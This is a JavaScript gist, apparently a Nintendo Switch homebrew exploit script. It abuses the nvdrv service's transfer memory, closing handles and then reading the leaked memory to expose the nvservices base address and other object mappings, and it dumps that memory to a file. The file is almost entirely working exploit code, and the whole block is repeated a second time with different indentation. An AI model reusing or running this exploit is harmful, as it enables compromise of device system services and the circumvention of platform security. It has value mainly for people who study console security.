daeken/testnv.js Secret

## testnv.js
var nvdev = function(name, hnd, tdsize) {
	this.hnd = hnd;
	var nbuf = utils.str2ab(name);
	utils.dlog('Opening nvdev ' + name);
	this.handle = window.sc.ipcMsg(0).data(tdsize).aDescriptor(nbuf, nbuf.byteLength, 0).sendTo(this.hnd).assertOk().data[0];
	utils.dlog('Handle: ' + this.handle.toString(16));
	window.sc.free(nbuf);
};

nvdev.prototype.ioctl = function(num, buf) {
	utils.dlog('Send ioctl');
	var resp = window.sc.ipcMsg(1).datau32(this.handle, num, 0, 0).aDescriptor(buf, buf.byteLength, 0).bDescriptor(buf, buf.byteLength, 0).xDescriptor(0, 0, 0).cDescriptor(0, 0).sendTo(this.hnd).assertOk();
	return resp.data[0];
};

nvdev.prototype.close = function() {
	window.sc.ipcMsg(2).data(this.handle, 0).sendTo(this.hnd);
};

var nvserv = function(tback) {
	this.svchnd = window.sc.getService('nvdrv').assertOk();
	this.tback = tback;
	this.tmem = window.sc.getArrayBufferAddr(this.tback);
	this.thandle = window.sc.svcCreateTransferMemory(tback.buffer, 0).assertOk();
	window.sc.ipcMsg(3).datau32(this.tback.byteLength).copyHandle(0xffff8001).copyHandle(this.thandle).sendTo(this.svchnd).assertOk();
};

nvserv.prototype.open = function(name) {
	return new nvdev(name, this.svchnd, this.tback.byteLength);
};

nvserv.prototype.leak = function() {
	window.sc.svcCloseHandle(this.svchnd).assertOk();
	window.sc.svcCloseHandle(this.thandle).assertOk();
	var is_leaked = false;
	while (!is_leaked) {
		is_leaked = (sc.svcQueryMem(this.tmem).assertOk()[3] == 'RW');
	}
	return this.tmem;
};


var nvown = function(tback) {
	this.svc = new nvserv(tback);
	this.gpu = this.svc.open('/dev/nvhost-gpu');
};

function leakPrev(size) {
	var leaker = new nvown(new Uint32Array(1 * 1024 * 1024 / 4));
	var addr = leaker.svc.leak();
	var base = sc.read8(addr, 0x8008 >> 2);
	leaker.svc.tback = null;
	switch(size) {
	case 1:
		return utils.sub2(base, 0x8000);
	case 8:
		return utils.sub2(base, 0xc000);
	case 64:
		return utils.sub2(base, 0x2b000);
	}
	return base;
};

var tback = new Uint32Array(1 * 1024 * 1024 / 4);
var obj1 = new nvown(tback);
obj1.svc.open('/dev/nvhost-gpu');
var buf = obj1.svc.leak();
var nvhost_channel = sc.read8(buf, 0xC000 >> 2);
var nvbase = utils.sub2(nvhost_channel, 0x61f910);
utils.log('nvservices base at ' + utils.paddr(nvbase));
tback = obj1.svc.tback = null;

var temp = new nvown(new Uint32Array(1 * 1024 * 1024 / 4));
var tempBase = leakPrev(1);
utils.log('address of current temp object mapping: ' + utils.paddr(tempBase));
buf = temp.svc.leak();
sc.memdump(buf, 1 * 1024 * 1024, "cdump.bin");
var tempBase2 = utils.sub2(sc.read8(buf, 0x1008 >> 2), 0x1A48);
utils.log('confirming address from leaked buffer: ' + utils.paddr(tempBase2));
	var nvdev = function(name, hnd, tdsize) {
	this.hnd = hnd;
	var nbuf = utils.str2ab(name);
	utils.dlog('Opening nvdev ' + name);
	this.handle = window.sc.ipcMsg(0).data(tdsize).aDescriptor(nbuf, nbuf.byteLength, 0).sendTo(this.hnd).assertOk().data[0];
	utils.dlog('Handle: ' + this.handle.toString(16));
	window.sc.free(nbuf);
	};

	nvdev.prototype.ioctl = function(num, buf) {
	utils.dlog('Send ioctl');
	var resp = window.sc.ipcMsg(1).datau32(this.handle, num, 0, 0).aDescriptor(buf, buf.byteLength, 0).bDescriptor(buf, buf.byteLength, 0).xDescriptor(0, 0, 0).cDescriptor(0, 0).sendTo(this.hnd).assertOk();
	return resp.data[0];
	};

	nvdev.prototype.close = function() {
	window.sc.ipcMsg(2).data(this.handle, 0).sendTo(this.hnd);
	};

	var nvserv = function(tback) {
	this.svchnd = window.sc.getService('nvdrv').assertOk();
	this.tback = tback;
	this.tmem = window.sc.getArrayBufferAddr(this.tback);
	this.thandle = window.sc.svcCreateTransferMemory(tback.buffer, 0).assertOk();
	window.sc.ipcMsg(3).datau32(this.tback.byteLength).copyHandle(0xffff8001).copyHandle(this.thandle).sendTo(this.svchnd).assertOk();
	};

	nvserv.prototype.open = function(name) {
	return new nvdev(name, this.svchnd, this.tback.byteLength);
	};

	nvserv.prototype.leak = function() {
	window.sc.svcCloseHandle(this.svchnd).assertOk();
	window.sc.svcCloseHandle(this.thandle).assertOk();
	var is_leaked = false;
	while (!is_leaked) {
	is_leaked = (sc.svcQueryMem(this.tmem).assertOk()[3] == 'RW');
	}
	return this.tmem;
	};


	var nvown = function(tback) {
	this.svc = new nvserv(tback);
	this.gpu = this.svc.open('/dev/nvhost-gpu');
	};

	function leakPrev(size) {
	var leaker = new nvown(new Uint32Array(1 * 1024 * 1024 / 4));
	var addr = leaker.svc.leak();
	var base = sc.read8(addr, 0x8008 >> 2);
	leaker.svc.tback = null;
	switch(size) {
	case 1:
	return utils.sub2(base, 0x8000);
	case 8:
	return utils.sub2(base, 0xc000);
	case 64:
	return utils.sub2(base, 0x2b000);
	}
	return base;
	};

	var tback = new Uint32Array(1 * 1024 * 1024 / 4);
	var obj1 = new nvown(tback);
	obj1.svc.open('/dev/nvhost-gpu');
	var buf = obj1.svc.leak();
	var nvhost_channel = sc.read8(buf, 0xC000 >> 2);
	var nvbase = utils.sub2(nvhost_channel, 0x61f910);
	utils.log('nvservices base at ' + utils.paddr(nvbase));
	tback = obj1.svc.tback = null;

	var temp = new nvown(new Uint32Array(1 * 1024 * 1024 / 4));
	var tempBase = leakPrev(1);
	utils.log('address of current temp object mapping: ' + utils.paddr(tempBase));
	buf = temp.svc.leak();
	sc.memdump(buf, 1 * 1024 * 1024, "cdump.bin");
	var tempBase2 = utils.sub2(sc.read8(buf, 0x1008 >> 2), 0x1A48);
	utils.log('confirming address from leaked buffer: ' + utils.paddr(tempBase2));